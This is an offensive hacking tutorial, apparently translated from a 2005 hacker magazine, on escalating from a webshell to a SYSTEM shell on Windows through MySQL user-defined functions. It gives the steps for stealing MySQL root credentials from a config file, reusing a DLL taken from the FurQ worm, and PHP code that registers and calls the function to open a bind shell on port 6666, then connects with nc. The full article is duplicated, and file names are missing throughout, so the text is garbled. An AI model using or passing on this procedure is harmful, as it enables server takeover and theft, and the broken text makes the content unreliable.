Author kEvin
Note: The manuscript has been published in the 7th issue of "Hacker Line" in 2005. Please note the copyright and source for reprinting.
Not long ago, a MySQL Func vulnerability was published online, which talks about using MySQL to create a custom function and then attacking the server through this function. The first relevant report I saw was on o-otik, but the Exploit for Unix systems was published, and the success rate was not very high. Recently, some experts in China released related articles for Win systems, so I immediately asked them to study with my friends.
In fact, we have long thought that when we attack the MSSQL\Oracle database, we get the most high-permission accounts in the database, and often execute special extension procedures or functions to attack. For example, MSSQL has Xp_cmdshell, and Oracle can create a special function through it. But we never thought that MySQL, one of the popular database software, can also create functions. From this point of view, this vulnerability in MySQL should not be called a vulnerability but just a technology.
After talking nonsense, let’s learn how to create a function in MySQL. This is much more important than how to use it. As long as you understand the principles, you can use it more flexible and can be integrated with other ideas.
The statement to create a function in MySQL is:
Create Function FunctionName Returns [String|Integer|Real] Soname 'C:\';
FunctionName refers to the name of the function, C:\ refers to the DLL called by the function, and the function name is the function name in the DLL. However, we need to note here that if we need MySQL to attach a parameter to the function, then we must comply with the UDF program writing rules. For details, you can check the Section 14 of the MySQL manual: "Adding a New Function to MySQL". Among them, STRING, INTEGET, and REAL are after the function is executed. The form of the returned value. Of course, we don’t have to follow the UDF form. In fact, if we use a code we want to execute in our function without using parameters, we can still achieve the attack effect, such as System(""), etc. The FurQ worm that is now attacking with this vulnerability on the Internet is an example of not using the UDF format. But note that this statement to create the function must require the MySQL account we use to have write permissions to the mysql database, otherwise it will not be used normally.
OK. After understanding the principle, let’s take a look at how to use MySQL to increase permissions.
Here we have obtained a server WebShell through various vulnerabilities. What I am demonstrating here is angel's phpspy, because PHP has functions to connect to MySQL by default, while ASP needs to use additional components to connect, which does not meet the conditions.
Generally speaking, under the Win system, many software will create a file called in the system directory, which contains very sensitive MySQL information. If the host we overcome does not have very good permission settings, we have browsing permissions to the %windir% directory, so it can be read very easily. Moreover, many administrators usually write root accounts and passwords into this, so once we read the root user's password, we can manipulate the entire MySQL database or server. As shown in Figure 1.
After getting the MySQL Root password, we need to upload our DLL file. I am using extracted from the FurQ worm. Execute the shell function in this, and the system will open a CMDShell with a password on port 6666. Of course, we already know the password, which is just a few characters "FurQ". However, we do not have the conditions to execute. We need to create this function into MySQL through MySQL.
Now, we use PHPSPY to create a new PHP file.
Enter the following content
<?php
$link=mysql_connect('127.0.0.1','root','root');
if (!$link) {
die('Could NOt Connect The Database!: ' . mysql_error());
};
echo "Good !<br>";
//The root\root here is the user and password read from it.
@mysql_select_db('mysql') or die ('use database mysql failed!');
echo "Yes You Did!<br>";
// Here you choose to use MySQL database table. Of course, you can also choose something else, such as test.
$query="Create Function Shell RETURNS INTEGER SONAME 'd:\\wwwroot\\';";
@$result = mysql_query($query, $link) or die ("Create Function Failed!");
echo "Goddess...Successed!<br>";
//These two sentences are the key, execute MySQL creation function statement. Create the Shell function in d:\wwwroot\ into MySQL. This allows MySQL to execute this Shell function.
$query="Select Shell();";
@$result = mysql_query($query, $link) or die ("Execute failed");
echo "Congratulations! Connect The Port 6666 Of This Server VS password:FurQ<br>";
//This step is to execute this shell function and open the 6666 port of the server.
?>
Execute again, all of them return normally. As shown in Figure 2. Now, we can use the nc to connect to the server's 6666 port, enter this password: FurQ. Then we return CMDSHELL. Of course, since it inherits MySQL permissions, MySQL is installed by default in the Win system. That is to say, the Shell we get is LocalSystem permission, and you can do whatever you want, but don't do bad things. Haha.
Note: The manuscript has been published in the 7th issue of "Hacker Line" in 2005. Please note the copyright and source for reprinting.
Not long ago, a MySQL Func vulnerability was published online, which talks about using MySQL to create a custom function and then attacking the server through this function. The first relevant report I saw was on o-otik, but the Exploit for Unix systems was published, and the success rate was not very high. Recently, some experts in China released related articles for Win systems, so I immediately asked them to study with my friends.
In fact, we have long thought that when we attack the MSSQL\Oracle database, we get the most high-permission accounts in the database, and often execute special extension procedures or functions to attack. For example, MSSQL has Xp_cmdshell, and Oracle can create a special function through it. But we never thought that MySQL, one of the popular database software, can also create functions. From this point of view, this vulnerability in MySQL should not be called a vulnerability but just a technology.
After talking nonsense, let’s learn how to create a function in MySQL. This is much more important than how to use it. As long as you understand the principles, you can use it more flexible and can be integrated with other ideas.
The statement to create a function in MySQL is:
Create Function FunctionName Returns [String|Integer|Real] Soname 'C:\';
FunctionName refers to the name of the function, C:\ refers to the DLL called by the function, and the function name is the function name in the DLL. However, we need to note here that if we need MySQL to attach a parameter to the function, then we must comply with the UDF program writing rules. For details, you can check the Section 14 of the MySQL manual: "Adding a New Function to MySQL". Among them, STRING, INTEGET, and REAL are after the function is executed. The form of the returned value. Of course, we don’t have to follow the UDF form. In fact, if we use a code we want to execute in our function without using parameters, we can still achieve the attack effect, such as System(""), etc. The FurQ worm that is now attacking with this vulnerability on the Internet is an example of not using the UDF format. But note that this statement to create the function must require the MySQL account we use to have write permissions to the mysql database, otherwise it will not be used normally.
OK. After understanding the principle, let’s take a look at how to use MySQL to increase permissions.
Here we have obtained a server WebShell through various vulnerabilities. What I am demonstrating here is angel's phpspy, because PHP has functions to connect to MySQL by default, while ASP needs to use additional components to connect, which does not meet the conditions.
Generally speaking, under the Win system, many software will create a file called in the system directory, which contains very sensitive MySQL information. If the host we overcome does not have very good permission settings, we have browsing permissions to the %windir% directory, so it can be read very easily. Moreover, many administrators usually write root accounts and passwords into this, so once we read the root user's password, we can manipulate the entire MySQL database or server. As shown in Figure 1.
After getting the MySQL Root password, we need to upload our DLL file. I am using extracted from the FurQ worm. Execute the shell function in this, and the system will open a CMDShell with a password on port 6666. Of course, we already know the password, which is just a few characters "FurQ". However, we do not have the conditions to execute. We need to create this function into MySQL through MySQL.
Now, we use PHPSPY to create a new PHP file.
Enter the following content
<?php
$link=mysql_connect('127.0.0.1','root','root');
if (!$link) {
die('Could NOt Connect The Database!: ' . mysql_error());
};
echo "Good !<br>";
//The root\root here is the user and password read from it.
@mysql_select_db('mysql') or die ('use database mysql failed!');
echo "Yes You Did!<br>";
// Here you choose to use MySQL database table. Of course, you can also choose something else, such as test.
$query="Create Function Shell RETURNS INTEGER SONAME 'd:\\wwwroot\\';";
@$result = mysql_query($query, $link) or die ("Create Function Failed!");
echo "Goddess...Successed!<br>";
//These two sentences are the key, execute MySQL creation function statement. Create the Shell function in d:\wwwroot\ into MySQL. This allows MySQL to execute this Shell function.
$query="Select Shell();";
@$result = mysql_query($query, $link) or die ("Execute failed");
echo "Congratulations! Connect The Port 6666 Of This Server VS password:FurQ<br>";
//This step is to execute this shell function and open the 6666 port of the server.
?>
Execute again, all of them return normally. As shown in Figure 2. Now, we can use the nc to connect to the server's 6666 port, enter this password: FurQ. Then we return CMDSHELL. Of course, since it inherits MySQL permissions, MySQL is installed by default in the Win system. That is to say, the Shell we get is LocalSystem permission, and you can do whatever you want, but don't do bad things. Haha.